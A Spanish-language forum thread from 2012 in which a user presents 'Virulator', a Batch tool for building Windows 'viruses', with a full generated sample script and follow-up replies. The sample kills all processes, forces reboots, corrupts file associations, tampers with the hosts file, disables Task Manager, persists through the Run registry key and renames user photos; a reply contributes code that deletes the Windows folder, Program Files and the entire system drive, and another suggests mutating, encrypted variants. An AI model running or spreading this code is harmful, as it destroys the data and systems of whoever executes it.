[Batch] Virulator 1.0c

Eleкtro · 13 Junio 2012, 12:04 PM

VIRULATOR

By Elektro H@cker

Virulator es un creador de "virus" para los amantes de Batch.

Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).

Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino

.

- SCREENSHOTS:

- También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...

- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:

Código (dos) [Seleccionar]

@Echo OFF
Title sdsdsd

:: Virus creado con [Virulator 1.0]
:: By Elektro H@cker
:: No me hago repsonsable del uso de este archivo.

If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)
 

REM Matar proceso "explorer.exe"
Taskkill /F /IM "explorer.exe" >NUL 2>&1 


REM Matar todos los procesos activos del sistema
For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)
 

REM Programar el apagado del PC en 60 segundos
Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL


REM Da¤ar las extensiones de archivos de imagen
ASSOC .ani=regfile >NUL 2>&1
ASSOC .bmp=regfile >NUL 2>&1
ASSOC .cur=regfile >NUL 2>&1
ASSOC .gif=regfile >NUL 2>&1
ASSOC .ico=regfile >NUL 2>&1
ASSOC .img=regfile >NUL 2>&1
ASSOC .jpe=regfile >NUL 2>&1
ASSOC .jpg=regfile >NUL 2>&1
ASSOC .jpeg=regfile >NUL 2>&1
ASSOC .pcd=regfile >NUL 2>&1
ASSOC .png=regfile >NUL 2>&1
ASSOC .psd=regfile >NUL 2>&1
ASSOC .tga=regfile >NUL 2>&1
ASSOC .tif=regfile >NUL 2>&1
ASSOC .tiff=regfile >NUL 2>&1
 

REM Abrir multi instancia "notepad.exe"
Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
Start /B CMD /C "%TEMP%\%~n0_720826398.bat"
 

REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"%TEMP%\virulator.vbs"
Start /B Wscript "%TEMP%\virulator.vbs"
 

REM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1 
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1 
Echo 127.0.1.1	google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1	www.google.com>>"%windir%\System32\drivers\etc\hosts"
 

REM Bucle infinito
Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
Start CMD /K "%TEMP%\%~n0_2514423018.bat"
 

REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
Copy /Y %0 "%WINDIR%\" >NUL 2>&1 
Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1  


REM Modificar fecha de Windows (Bucle infinito secuencial)
Echo :DateUP >"%TEMP%\DateUP.bat"
Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
Echo 	For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
Echo 		For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
Echo 			Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
Echo 			ping -n 1 localhost >>"%TEMP%\DateUP.bat"
Echo 		) >>"%TEMP%\DateUP.bat"
Echo 	) >>"%TEMP%\DateUP.bat"
Echo ) >>"%TEMP%\DateUP.bat"
Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"


REM Modificar hora de Windows (Bucle infinito secuencial)
Echo :TimeUP >"%TEMP%\TimeUP.bat"
Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
Echo 	For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
Echo 		Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
Echo 		ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
Echo 	) >>"%TEMP%\TimeUP.bat"
Echo ) >>"%TEMP%\TimeUP.bat"
Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"
 

REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
label Disco C: Infectado>nul
 

REM Renombrar extension ".jpg" a ".txt" 
FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)
 

REM Hibernar el PC
RunDll32.exe powrprof.dll,SetSuspendState
 

REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
 

REM Intercambiar los botones del mouse
Rundll32 User32.dll,SwapMouseButton
 

REM Fake-Virus 1 "Fake25917820"
(
echo @echo off
echo color 47
echo net stop themes 2^>nul
echo title INFECCION VIRAL PROFUNDA!
echo echo INFECCION VIRAL!!!
echo echo ERROR!!!
echo ECHO+
echo echo -
echo echo virus - TROJAN_DEMOLISHER code #45643676
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo FIREWALL - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo ANTI-VIRUS - FALLO
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo DIRECCION IP - RECHAZADA
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo echo FIRMA VIRAL: ****-****-****-8894
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO AREAS INFECTADAS...
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo set /a num=0
echo :repeat1
echo set /a num=%%num%%+1
echo echo %%num%%
echo if %%num%%==100 goto end
echo goto repeat1
echo :end
echo PING -n 1 LOCALHOST ^>nul
echo cls
echo echo -
echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
echo echo -
echo echo INFECCION FATAL!
echo PING -n 3 LOCALHOST ^>nul
echo echo -
echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
echo echo -
echo echo PORFAVOR NO APAGUE EL SISTEMA
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
echo cls
echo echo -
echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
echo echo -
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo echo -
echo echo ESCANEANDO...
echo echo -
echo PING -n 2 LOCALHOST ^>nul
echo set /a num1=0
echo :repeat2
echo set /a num1=%%num1%% +1
echo echo %%num1%%
echo if %%num1%%==100 goto end1
echo goto repeat2
echo :end1
echo cls
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
echo echo - 
echo PING -n 3 LOCALHOST ^>nul
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo echo ERROR
echo PING -n 3 LOCALHOST ^>nul
echo cls
echo title FALLO EN EL SISTEMA
echo color 17
echo echo ERROR!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA VIRTUAL PERDIDA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo MEMORIA FISICA SOBRECALENTADA!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo echo PROCESADOR SOBRECALENTANDOSE!
echo PING -n 2 LOCALHOST ^>nul
echo echo -
echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
echo echo -
echo PING -n 4 LOCALHOST ^>nul
echo echo -
echo echo -
echo echo -
echo echo -
echo ECHO RIESGO DE FUEGO ENCONTRADO!
echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
echo echo -
echo echo -
echo echo -
echo echo -
echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
echo PING -n 8 LOCALHOST ^>nul
echo Exit
)>%TEMP%\Fake25917820.bat
Start CMD /K %TEMP%\Fake25917820.bat


REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
(
echo @echo off
echo setlocal enabledelayedexpansion
echo Set File=0
echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
echo Exit
echo :Copy
echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
echo Set /A File+=1
echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
)>%TEMP%\basura.bat
Start /B %TEMP%\basura.bat

- Y por último, Aquí tienen el script:
Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p

~~(CASI)~~Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).

Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir

.

PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor .
Gracias.

Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.

Jenag · 13 Junio 2012, 12:22 PM

Mola lo del reloj y la fecha y demás.Está bastante chulazo.Eres un crack , EleKtro H@cker.

Jenag · 13 Junio 2012, 12:25 PM

Una cosa en :

CitarREM Bloquear pagina web "google.com"
takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"

No deberia ser 127.0.0.1.¿eh?.

Eleкtro · 13 Junio 2012, 12:33 PM

Cita de: Jenag en 13 Junio 2012, 12:25 PM
Una cosa en :No deberia ser 127.0.0.1.¿eh?.

Errata avistada!

, Aunque las páginas se bloquean igualmente, Así que lo dejo sin corregir hasta que tenga algo más para actualizar el script.

Cita de: Jenag en 13 Junio 2012, 12:22 PM
Mola lo del reloj y la fecha y demás.Está bastante chulazo

Gracias por comentar besitos xD

un saludo

EDITO:

Versión 1.0c

Corregida la errata de la IP, Y Arreglado las opciones de propagación, que era lo único que me quedaba por testear a fondo (No funcionaban).

CrowSuz · 13 Junio 2012, 13:57 PM

Tiene bastante buena pinta esto, yo soy bastante cabezota y por aprender me gusta programarme todo, por basico que sea, pero seguramente le eche un vistazo al codigo para ver como hacen las cosas los que saben de esto

Un saludo!

-- KiLiaN -- · 13 Junio 2012, 14:00 PM

Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia

Eleкtro · 13 Junio 2012, 14:11 PM

Cita de: -- KiLiaN -- en 13 Junio 2012, 14:00 PM
Cuando llegue a mi casa esta tarde, te hago de betatester en XP y si falla algo se cambia

que bien, que bien!

saludos

Flamer · 13 Junio 2012, 17:12 PM

hola y felisidades elecktro hacker boy a calarlo aver que tal en xp; seme ocurre algo que puedes añadir que los bichos que se crean; tengan la opcion de ser mutantes que cambien algunas lineas que estan abajo para arriba; que añadan codigo basura;que cambeen algunas partes de algunas lineas; que infecte accesos directos y que cambee el nombre en cada ejecucion.
Seme ocurre algo pero nose si se pueda en batch que el codigo este cifrado y al ejecutarlo se desencripte.
bueno saludos lo ultimo boy aber si sepuede

-- KiLiaN -- · 13 Junio 2012, 17:23 PM

De momento he cambiado la opción de borrar carpetas y ficheros:

Código (dos) [Seleccionar]


:KillFiles
Set "DIRFILE=%DIRFILE:^"=%" & Rem "
Echo+>>"%File%" & Echo REM Eliminar el archivo o ruta "%DIRFILE%">>"%File%"
Echo cacls "%DIRFILE%" /E /T /P "%username%":F^>nul 2^>^&1 >>"%FILE%"
Echo cacls "%DIRFILE%\*" /E /T /P "%username%":F ^>nul 2^>^&1 >>"%FILE%" 
Echo Del /Q "%DIRFILE%" 2^>NUL
RD /Q /S "%DIRFILE%" ^>NUL 2^>^&1 >>"%FILE%"
call :continuar :KillFiles

Y en las preconfiguraciones:

Código (dos) [Seleccionar]

:KillFiles_Preconfigurado_Windows
(
Echo+
Echo REM Eliminar todos los archivos de "Windows"
Echo cacls "%%WINDIR%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo RD /Q /S "%%WINDIR%%" ^>nul 2^>^&1
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles

:KillFiles_Preconfigurado_programas
(
Echo+
Echo REM Eliminar todos los archivos de "Archivos de programa" x86-x64

Echo cacls "%%PROGRAMFILES%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo cacls "%%PROGRAMFILES(X86)%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo RD /Q /S "%%PROGRAMFILES%%" ^>nul 2^>^&1
Echo RD /Q /S "%%PROGRAMFILES(X86)%%" ^>nul 2^>^&1
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles

:KillFiles_Preconfigurado_Disco
(
Echo+
Echo REM Eliminar todos los archivos del disco duro principal
Echo cacls "%%Systemdrive%%\*" /E /T /P "%%username%%":F ^>nul 2^>^&1
Echo For /D %%%%a in ^(%%SYSTEMDRIVE%%\*^) do ^(RD /Q /S "%%%%a" ^>nul 2^>^&1^)
)>>"%FILE%"
set dirfile=
call :continuar :KillFiles

También donde se cambia el archivo Host pero si sigo, voy a copiar aqui medio script..
Icalcs y takedown no existierón hasta el Vista..asique con eso rula.

Más adelante en las opciónes de cambiar la fecha y la hora haces referencía a un archivo llamado invisible.vbs que no se crea previamente (por lo tanto da error de que no existe).

En la opción de borrar carpetas y ficheros si metes la ruta con comillas se cierra.

Por lo demás me va de lujo, muy bueno y muy limpio el code se me ocurre que quizás se le pueda añadir opción a borrar alguna parte del historial eligiendo el número pero no he encontrado aún como meterle mano (como seleccionar una parte del archivo para borrarlo, poniendo etiquetas? nose), aún me quedan por tester la opciones de cambiar los botones del ratón y las que deshabilitan el apagado, el cambio de user, etc, que he mirado por lo alto y no tiene porque dar error..desde mi conocimiento limitado.

Puntoinfinito · 16 Junio 2012, 00:25 AM

JO-DER

Vaya currada que nos has regalado ¡eh!

Oye... eso de crear un bucle que ¿función tiene?